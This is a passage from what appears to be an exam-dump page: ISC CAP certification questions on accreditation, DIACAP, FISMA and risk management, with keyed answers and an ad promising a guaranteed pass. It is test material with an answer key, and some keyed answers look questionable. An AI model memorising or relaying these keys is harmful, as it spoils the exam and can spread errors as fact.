B. Accreditation is a comprehensive assessment of the management, operational, and technical security controls in an information system.
C. Certification is the official management decision given by a senior agency official to authorize operation of an information system.
D. Certification is a comprehensive assessment of the management, operational, and technical security controls in an information system.
Correct Answer: AD
QUESTION 14
Which of the following requires all general support systems and major applications to be fully certified and accredited before these systems and applications are put into production? Each correct answer represents a part of the solution. Choose all that apply.
A. NIST
B. FIPS
C. FISMA
D. Office of Management and Budget (OMB)
Correct Answer: CD
QUESTION 15
The National Information Assurance Certification and Accreditation Process (NIACAP) is the minimum standard process for the certification and accreditation of computer and telecommunications systems that handle U.S. national security information. What are the different types of NIACAP accreditation? Each correct answer represents a complete solution. Choose all that apply.
A. Secure accreditation
B. Type accreditation
C. System accreditation
D. Site accreditation
Correct Answer: BCD
QUESTION 16
According to U.S. Department of Defense (DoD) Instruction 8500.2, there are eight Information Assurance
(IA) areas, and the controls are referred to as IA controls. Which of the following are among the eight
areas of IA defined by DoD?
Each correct answer represents a complete solution. Choose all that apply.
A. VI Vulnerability and Incident Management
B. DC Security Design & Configuration
C. EC Enclave and Computing Environment
D. Information systems acquisition, development, and maintenance
Correct Answer: ABC
QUESTION 17
DIACAP applies to the acquisition, operation, and sustainment of any DoD system that collects, stores,
transmits, or processes unclassified or classified information since December 1997. What phases are
identified by DIACAP?
Each correct answer represents a complete solution. Choose all that apply.
A. Validation
B. Re-Accreditation
C. Verification
D. System Definition
E. Identification
F. Accreditation
Correct Answer: ABCD
QUESTION 18
Which of the following is a subset discipline of Corporate Governance focused on information security systems and their performance and risk management?
A. Lanham Act
B. ISG
C. Clinger-Cohen Act
D. Computer Misuse Act
Correct Answer: B QUESTION 19
Ben is the project manager of the YHT Project for his company. Alice, one of his team members, is confused about when project risks will happen in the project. Which one of the following statements is the most accurate about when project risk happens?
A. Project risk can happen at any moment.
B. Project risk is uncertain, so no one can predict when the event will happen.
C. Project risk happens throughout the project execution.
D. Project riskis always in the future.
Correct Answer: D
QUESTION 20
You are the project manager of the NKJ Project for your company. The project’s success or failure will have a significant impact on your organization’s profitability for the coming year. Management has asked you to identify the risk events and communicate the event’s probability and impact as early as possible in the project. Management wants to avoid risk events and needs to analyze the cost-benefits of each risk event in this project. What term is assigned to the low-level of stakeholder tolerance in this project?
A. Risk avoidance
B. Mitigation-ready project management
C. Risk utility function
D. Risk-reward mentality
Correct Answer: C
QUESTION 21
Where can a project manager find risk-rating rules?
A. Risk probability and impact matrix
B. Organizational process assets
C. Enterprise environmental factors
D. Risk management plan
Correct Answer: B
QUESTION 22
There are five inputs to the quantitative risk analysis process. Which one of the following is NOT an input to the perform quantitative risk analysis process?
A. Risk register
B. Cost management plan
C. Risk management plan
D. Enterprise environmental factors
Correct Answer: D
QUESTION 23
Your project has several risks that may cause serious financial impact should they happen. You have studied the risk events and made some potential risk responses for the risk events but management wants you to do more. They’d like for you to create some type of a chart that identified the risk probability and impact with a financial amount for each risk event. What is the likely outcome of creating this type of chart?
A. Risk response plan
B. Quantitative analysis
C. Risk response
D. Contingency reserve
Correct Answer: D
QUESTION 24
Which of the following professionals is responsible for starting the Certification & Accreditation (C&A) process?
A. Authorizing Official
B. Chief Risk Officer (CRO)
C. Chief Information Officer (CIO)
D. Information system owner
Correct Answer: D
QUESTION 25
You are working as a project manager in your organization. You are nearing the final stages of project execution and looking towards the final risk monitoring and controlling activities. For your project archives, which one of the following is an output of risk monitoring and control?
A. Quantitative risk analysis
B. Qualitative risk analysis
C. Requested changes
D. Risk audits
Correct Answer: C
QUESTION 26
Which of the following DoD directives is referred to as the Defense Automation Resources Management Manual?
A. DoDD 8000.1
B. DoD 7950.1-M
C. DoD 5200.22-M
D. DoD 8910.1
E. DoD 5200.1-R
Correct Answer: B
QUESTION 27
The phase 3 of the Risk Management Framework (RMF) process is known as mitigation planning. Which of the following processes take place in phase 3? Each correct answer represents a complete solution. Choose all that apply.
A. Identify threats, vulnerabilities, and controls that will be evaluated.
B. Document and implement a mitigation plan.
C. Agree on a strategy to mitigate risks.
D. Evaluate mitigation progress and plan next assessment.
Correct Answer: BCD
QUESTION 28
Gary is the project manager of his organization. He is managing a project that is similar to a project his organization completed recently. Gary has decided that he will use the information from the past project to help him and the project team to identify the risks that may be present in the project. Management agrees that this checklist approach is ideal and will save time in the project. Which of the following statement is most accurate about the limitations of the checklist analysis approach for Gary?
A. The checklist analysis approach is fast but it is impossible to build and exhaustive checklist.
B. The checklist analysis approach only uses qualitative analysis.
C. The checklist analysis approach saves time, but can cost more.
D. The checklist is also known as top down risk assessment
Correct Answer: A
QUESTION 29
What are the subordinate tasks of the Initiate and Plan IA C&A phase of the DIACAP process? Each correct answer represents a complete solution. Choose all that apply.
A. Develop DIACAP strategy.
B. Assign IA controls.
C. Assemble DIACAP team.
D. Initiate IA implementation plan.
E. Register system with DoD Component IA Program.
F. Conduct validation activity.
Correct Answer: ABCDE
QUESTION 30
Information risk management (IRM) is the process of identifying and assessing risk, reducing it to an
acceptable level, and implementing the right mechanisms to maintain that level. What are the different
categories of risk?
Each correct answer represents a complete solution. Choose all that apply.
A. System interaction
B. Human interaction
C. Equipment malfunction
D. Inside and outside attacks
E. Social status
F. Physical damage
Correct Answer: BCDEF
Flydumps.com is the absolute way to pass your ISC CAP exam within no time. An authentic and comprehensive ISC CAP exam solution is available at Flydumps.com. With our exclusive online ISC CAP dump you will pass ISC CAP exam easily.Flydumps.com guarantees 100% success rate.
ISC CAP PDF Download, The Best ISC CAP Dumps Are Based On The Real Exam